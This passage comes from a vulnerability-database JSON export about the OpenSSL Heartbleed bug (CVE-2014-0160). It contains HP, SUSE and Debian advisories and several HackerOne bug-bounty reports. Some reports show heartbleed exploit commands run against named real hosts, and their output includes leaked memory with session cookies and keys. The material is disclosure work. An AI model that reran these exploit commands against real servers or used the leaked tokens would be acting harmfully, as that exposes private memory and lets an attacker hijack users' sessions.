at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 11 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNHUmgACgkQ4B86/C0qfVnJ0QCdHsWxy4zAHbs7fFx/+al24D/5\r\nhFYAn0AzeojK1hXP9Ky8v+kFeeglSrvP\r\n=ciWU\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30471", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30471", "title": "[security bulletin] HPSBMU02995 rev.1 - HP Software HP Service Manager, Asset Manager, UCMDB Browser, Executive Scorecard, Server Automation, Diagnostics, LoadRunner, Performance Center, "HeartBleed" OpenSSL Vulnerability, Remote Disclosure", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04272594\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04272594\r\nVersion: 1\r\n\r\nHPSBMU03032 rev.1 - HP Virtual Connect Firmware Smart Components Installer\r\nSoftware running OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-30\r\nLast Updated: 2014-04-30\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Virtual\r\nConnect Firmware Smart Components installer software running OpenSSL. This is\r\nthe OpenSSL vulnerability known as "Heartbleed" which could be exploited\r\nremotely resulting in disclosure of information.\r\n\r\nNote: additional information regarding the OpenSSL "Heartbleed" vulnerability\r\nconcerning HP Servers products is available at the following HP Customer\r\nNotice:\r\n\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_n\r\na-c04239413\r\n\r\nReferences: CVE-2014-0160, SSRT101549\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Virtual Connect Firmware Smart Components installer impacted products and\r\nversions\r\n\r\nHP BladeSystem c-Class Virtual Connect Firmware, Ethernet plus 4/8Gb 20-port\r\nand 8Gb 24-port FC Edition Component for Windows v4.10 and v4.20 Smart\r\nComponents installer\r\n\r\nHP BladeSystem c-Class Virtual Connect Support Utility (VCSU) 1.9.0 for Linux\r\nand Windows\r\n\r\nHP Smart Update Manager (SUM) 6.0.0 through 6.3.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has addressed this vulnerability for the impacted HP Virtual Connect\r\nFirmware Smart Components Installer software in the following updates and/or\r\nHP Security Bulletins.\r\n\r\nHP SPP Component\r\n Update Version or HP Security Bulletin\r\n Software Update or Security Bulletin Location\r\n\r\nHP BladeSystem c-Class Virtual Connect Firmware, Ethernet plus 4/8Gb 20-port\r\nand 8Gb 24-port FC Edition Component for Windows Smart Components installer\r\n v4.10B\r\n http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetai\r\nls/?sp4ts.oid=4144085&spf_p.tpst=swdMain&spf_p.prp_swdMain=wsrp-navigationalS\r\ntate%3Didx%253D%257CswItem%253DMTX_da108a1f80f644f79d3dcc8b98%257CswEnvOID%25\r\n3D4168%257CitemLocale%253D%257CswLang%253D%257Cmode%253D%257Caction%253Ddrive\r\nrDocument&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.end\r\nCacheTok=com.vignette.cachetoken\r\n\r\nHP BladeSystem c-Class Virtual Connect Firmware, Ethernet plus 4/8Gb 20-port\r\nand 8Gb 24-port FC Edition Component for Windows Smart Components installer\r\n v4.20B\r\n http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetai\r\nls/?sp4ts.oid=4144085&spf_p.tpst=swdMain&spf_p.prp_swdMain=wsrp-navigationalS\r\ntate%3Didx%253D%257CswItem%253DMTX_6c1bcbd3c5ae485cb936818973%257CswEnvOID%25\r\n3D4168%257CitemLocale%253D%257CswLang%253D%257Cmode%253D%257Caction%253Ddrive\r\nrDocument&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.end\r\nCacheTok=com.vignette.cachetoken\r\n\r\nHP BladeSystem c-Class Virtual Connect Support Utility (VCSU)\r\n HPSBMU03023\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04264271\r\n\r\nHP Smart Update Manager (SUM)\r\n HPSBMU02997\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04239375\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 30 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNhgGgACgkQ4B86/C0qfVkpbACg9DSqL62MTf5m+QNI1XWC6nfs\r\nqBQAoP7ssN3H3Bu8IacvYEILcwWUNn3E\r\n=tCt+\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-05-02T00:00:00", "published": "2014-05-02T00:00:00", "id": "SECURITYVULNS:DOC:30525", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30525", "title": "[security bulletin] HPSBMU03032 rev.1 - HP Virtual Connect Firmware Smart Components Installer Software running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04264595\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04264595\r\nVersion: 1\r\n\r\nHPSBST03004 rev.1 - HP IBRIX X9320 Storage running OpenSSL, Remote Disclosure\r\nof Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-05-01\r\nLast Updated: 2014-05-01\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP IBRIX X9320\r\nStorage running OpenSSL. This is the OpenSSL vulnerability known as\r\n"Heartbleed" which could be exploited remotely resulting in disclosure of\r\ninformation.\r\n\r\nReferences: CVE-2014-0160, SSRT101514\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP IBRIX X9320 Storage systems running HP StoreAll OS v6.3.3, v6.5 and v6.5.1\r\nwith these SKUs:\r\n\r\nQP333A\r\n HP IBRIX X9320 24TB 1TB 7.2K LFF Capacity Block Starter Kit\r\n\r\nQP334A\r\n HP IBRIX X9320 24TB 1TB 7.2K LFF Capacity Block Expansion Kit\r\n\r\nQP335A\r\n HP IBRIX X9320 48TB 2TB 7.2K LFF Capacity Block Starter Kit\r\n\r\nQP336A\r\n HP IBRIX X9320 48TB 2TB 7.2K LFF Capacity Block Expansion Kit\r\n\r\nQP337A\r\n HP IBRIX X9320 14.4TB 600GB 15K LFF Capacity Block Starter Kit\r\n\r\nQP338A\r\n HP IBRIX X9320 14.4TB 600GB 15K LFF Capacity Block Expansion Kit\r\n\r\nQZ722A\r\n HP IBRIX X9320 72TB 3TB 7.2K LFF MDL Storage Block Starter Kit\r\n\r\nQZ723A\r\n HP IBRIX X9320 72TB 3TB 7.2K LFF MDL Storage Block Expansion Kit\r\n\r\nQZ724A\r\n HP IBRIX X9320 7.2TB 300GB 10K SFF Enterprise Storage Block Starter Kit\r\n\r\nQZ725A\r\n HP IBRIX X9320 7.2TB 300GB 10K SFF Enterprise Storage Block Expansion Kit\r\n\r\nQZ726A\r\n HP IBRIX X9320 21.6TB 900GB 10K SFF Enterprise Storage Block Starter Kit\r\n\r\nQZ727A\r\n HP IBRIX X9320 21.6TB 900GB 10K SFF Enterprise Storage Block Expansion Kit\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP IBRIX X9320 Storage. This bulletin will be revised when the\r\nsoftware updates are released.\r\n\r\nUntil the software updates are available, HP recommends restricting\r\nadministrative access to the MSA on a secure and isolated private management\r\nnetwork.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 1 May 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNiyroACgkQ4B86/C0qfVmYEwCgoYdOOiwyP2DpeGeGb40tS0Br\r\njfMAoMLbmVB2pdVa9XAfs92eV2+hhLNu\r\n=ZY1m\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-05-02T00:00:00", "published": "2014-05-02T00:00:00", "id": "SECURITYVULNS:DOC:30524", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30524", "title": "[security bulletin] HPSBST03004 rev.1 - HP IBRIX X9320 Storage running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "hackerone": [{"lastseen": "2018-11-23T14:56:22", "bulletinFamily": "bugbounty", "bounty": 200.0, "description": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u043d\u0430 portal.sf.mail.ru\r\n\u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0447\u0438\u0442\u0430\u0442\u044c \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u0443\u044e \u043f\u0430\u043c\u044f\u0442\u044c \u043a\u0443\u0441\u043a\u0430\u043c\u0438 \u0440\u0430\u0437\u043c\u0435\u0440\u043e\u043c \u0434\u043e 64\u041a\u0411. \u041f\u0440\u0438\u0447\u0435\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u0432\u0443\u0441\u0442\u043e\u0440\u043e\u043d\u043d\u044f\u044f, \u044d\u0442\u043e \u0437\u043d\u0430\u0447\u0438\u0442, \u0447\u0442\u043e \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0432\u044b \u043c\u043e\u0436\u0435\u0442\u0435 \u0447\u0438\u0442\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u043d\u043e \u0438 \u0441\u0435\u0440\u0432\u0435\u0440 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0447\u0430\u0441\u0442\u044c \u0432\u0430\u0448\u0435\u0439 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0439 \u043f\u0430\u043c\u044f\u0442\u0438 \u043a\u0430\u043a \u044d\u0442\u043e \u0441\u0434\u0435\u043b\u0430\u043b \u0438 \u044f \u0440\u0430\u0434\u0438 \u0447\u0438\u0441\u0442\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430.", "modified": "2014-12-10T19:29:15", "published": "2014-10-23T15:12:13", "id": "H1:32570", "href": "https://hackerone.com/reports/32570", "type": "hackerone", "title": "Mail.ru: OpenSSL HeartBleed (CVE-2014-0160)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-04T10:02:55", "bulletinFamily": "bugbounty", "bounty": 0.0, "description": "Pls see attachment files for details:\r\npython ssltest.py concrete5.org 443|more\r\n\r\nimpact: critical, pls patch it ASAP\r\n\r\nReferences:\r\nhttps://www.openssl.org/news/secadv_20140407.txt\r\nhttp://heartbleed.com\r\nhttps://github.com/openssl/openssl/commit/96db9023b881d7cd9f379b0c154650d6c108e9a3\r\n~g4mm4\r\nhttps://twitter.com/xchym", "modified": "2014-04-09T00:37:33", "published": "2014-04-08T11:01:31", "id": "H1:6475", "href": "https://hackerone.com/reports/6475", "type": "hackerone", "title": "concrete5: https://concrete5.org ::: HeartBleed Attack (CVE-2014-0160)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T00:39:12", "bulletinFamily": "bugbounty", "bounty": 0.0, "description": "A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64k of memory to a connected client or server.\n\nOnly 1.0.1 and 1.0.2-beta releases of OpenSSL are affected including 1.0.1f and 1.0.2-beta1.\n\nThanks for Neel Mehta of Google Security for discovering this bug and to Adam Langley <agl@chromium.org> and Bodo Moeller <bmoeller@acm.org> for preparing the fix.\n\nAffected users should upgrade to OpenSSL 1.0.1g. Users unable to immediately upgrade can alternatively recompile OpenSSL with -DOPENSSL_NO_HEARTBEATS.\n\n1.0.2 will be fixed in 1.0.2-beta2.\n\nhttp://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=96db9023b881d7cd9f379b0c154650d6c108e9a3\n", "modified": "2014-04-07T16:53:31", "published": "2014-04-05T23:51:06", "id": "H1:6626", "href": "https://hackerone.com/reports/6626", "type": "hackerone", "title": "OpenSSL (IBB): TLS heartbeat read overrun", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-11-23T12:55:41", "bulletinFamily": "bugbounty", "bounty": 150.0, "description": "MacBook-Pro-Kirill:Pentest isox$ python heartbleed.py 185.30.178.33 -p 1443\r\n\r\ndefribulator v1.16\r\nA tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)\r\n\r\n##################################################################\r\nConnecting to: 185.30.178.33:1443, 1 times\r\nSending Client Hello for TLSv1.0\r\nReceived Server Hello for TLSv1.0\r\n\r\nWARNING: 185.30.178.33:1443 returned more data than it should - server is vulnerable!\r\nPlease wait... connection attempt 1 of 1\r\n##################################################################\r\n\r\n.@....SC[...r....+..H...9...\r\n....w.3....f...\r\n...!.9.8.........5...............\r\n.........3.2.....E.D...../...A.................................I.........\r\n...........\r\n...................................#.......X-Requested-With: XMLHttpRequest\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36\r\nReferer: https://adm.riotzone.net:1443/webadm/\r\nAccept-Encoding: gzip, deflate, sdch\r\nAccept-Language: en-US,en;q=0.8,ru;q=0.6\r\nCookie: fbm_335418533141749=base_domain=.riotzone.net; weblang=de; auser=1177778; atype=my; asess=2d53c33bbbb985848534e390323c0630; ashow=100007781204577@facebook; nofoo=1; anick=LaVerdad; aserv=1; level=50; sess_uid=1177778; sess_key=2d53c33bbbb985848534e390323c0630; __utma=72033936.1263205956.1413451723.1421595142.1421602346.373; __utmc=72033936; __utmz=72033936.1421073483.352.29.utmcsr=riotzone.net|utmccn=(referral)|utmcmd=referral|utmcct=/riot/RiotLoaderRelease.swf\r\n\r\n.....\r\nSM....)..Z..............b....o...~..^..DF..4......g..%.E.EaVHhJUTZhak8xNWdJYTRIZExkVXpuSVUxVmIwZHVrSV9ZTWw0bkpEQktHVkQyQ3Fpb190MGZFclhMYVg2bjVBMTZnVkZpMWlHMzJ3VFVPNTlvZFR2VU5QWnBjZXBRaVh5OTNHdVR5cEJlR2NCUzhENWR5WXJTcU1CNHRteTl2Q01YTUhjQ212STFkRzZid0poaCIsImlzc3VlZF9hdCI6MTQyMTYwMjM1NCwidXNlcl9pZCI6IjEwMDAwNzc4MTIwNDU3NyJ9; sess_uid=1177778; sess_key=2d53c33bbbb985848534e390323c0630; __utma=72033936.1263205956.1413451723.1421595142.1421602346.373; __utmb=72033936.2.10.1421602346; __utmc=72033936; __utmz=72033936.1421073483.352.29.utmcsr=riotzone.net|utmccn=(referral)|utmcmd=referral|utmcct=/riot/RiotLoaderRelease.swf\r\n", "modified": "2015-09-13T12:13:15", "published": "2015-01-19T13:54:12", "id": "H1:44294", "href": "https://hackerone.com/reports/44294", "type": "hackerone", "title": "Mail.ru: Heartbleed: my.com (185.30.178.33) port 1433", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-11-23T12:55:41", "bulletinFamily": "bugbounty", "bounty": 150.0, "description": "MacBook-Pro-Kirill:Pentest isox$ python heartbleed.py scfbp.tng.mail.ru\r\n\r\ndefribulator v1.16\r\nA tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)\r\n\r\n##################################################################\r\nConnecting to: scfbp.tng.mail.ru:443, 1 times\r\nSending Client Hello for TLSv1.0\r\nReceived Server Hello for TLSv1.0\r\n\r\nWARNING: scfbp.tng.mail.ru:443 returned more data than it should - server is vulnerable!\r\nPlease wait... connection attempt 1 of 1\r\n##################################################################\r\n\r\n.@....SC[...r....+..H...9...\r\n....w.3....f...\r\n...!.9.8.........5...............\r\n.........3.2.....E.D...../...A.................................I.........\r\n...........\r\n...................................#.........Y.[.uu.n.~J....4.F.P.<.5}b.n\r\n.................................3t.............http/1.1.spdy/3.1.h2-14uP.........\r\n.............WXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1\r\nHost: 195.211.20.229\r\nAccept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1\r\n", "modified": "2015-09-13T12:16:27", "published": "2015-02-25T07:49:11", "id": "H1:49139", "href": "https://hackerone.com/reports/49139", "type": "hackerone", "title": "Mail.ru: scfbp.tng.mail.ru: Heartbleed", "cvss": {"score": 0.0, "vector": "NONE"}}], "suse": [{"lastseen": "2016-09-04T11:46:33", "bulletinFamily": "unix", "description": "This openssl update fixes one security issue:\n\n - bnc#872299: Fixed missing bounds checks for heartbeat\n messages (CVE-2014-0160).\n\n", "modified": "2014-04-08T13:04:15", "published": "2014-04-08T13:04:15", "id": "OPENSUSE-SU-2014:0492-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00004.html", "title": "update for openssl (important)", "type": "suse", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "debian": [{"lastseen": "2019-05-30T02:22:16", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2896-2 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nApril 08, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : openssl\nCVE ID : CVE-2014-0160\n\nThis revision to the recent OpenSSL update, DSA-2896-1, checks for some\nservices that may use OpenSSL in a way that they expose the\nvulnerability. Such services are proposed to be restarted during the\nupgrade to help in the actual deployment of the fix.\n\nThe list of services that are checked is not comprehensive. For a more\ndetailed check, it is recommended to use the checkrestart tool from the\ndebian-goodies package. Note that client applications also need to be\nrestarted.\n\nIn case of doubt a full system restart is recommended.\n\nFor reference, the original advisory text follows.\n\nA vulnerability has been discovered in OpenSSL's support for the\nTLS/DTLS Hearbeat extension. Up to 64KB of memory from either client or\nserver can be recovered by an attacker. This vulnerability might allow\nan attacker to compromise the private key and other sensitive data in\nmemory.\n\nAll users are urged to upgrade their openssl packages (especially\nlibssl1.0.0) and restart applications as soon as possible.\n\nAccording to the currently available information, private keys should be\nconsidered as compromised and regenerated as soon as possible. More\ndetails will be communicated at a later time.\n\nThe oldstable distribution (squeeze) is not affected by this\nvulnerability.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.0.1e-2+deb7u6.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your openssl packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2014-04-08T13:47:33", "published": "2014-04-08T13:47:33", "id": "DEBIAN:DSA-2896-2:FEB91", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00072.html", "title": "[SECURITY] [DSA 2896-2] openssl security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-30T02:21:22", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2896-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nApril 07, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : openssl\nCVE ID : CVE-2014-0160\nDebian Bug : 743883\n\nA vulnerability has been discovered in OpenSSL's support for the\nTLS/DTLS Hearbeat extension. Up to 64KB of memory from either client or\nserver can be recovered by an attacker This vulnerability might allow an\nattacker to compromise the private key and other sensitive data in\nmemory.\n\nAll users are urged to upgrade their openssl packages (especially\nlibssl1.0.0) and restart applications as soon as possible.\n\nAccording to the currently available information, private keys should be\nconsidered as compromised and regenerated as soon as possible. More\ndetails will be communicated at a later time.\n\nThe oldstable distribution (squeeze) is not affected by this\nvulnerability.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.0.1e-2+deb7u5.\n\nFor the testing distribution (jessie), this problem 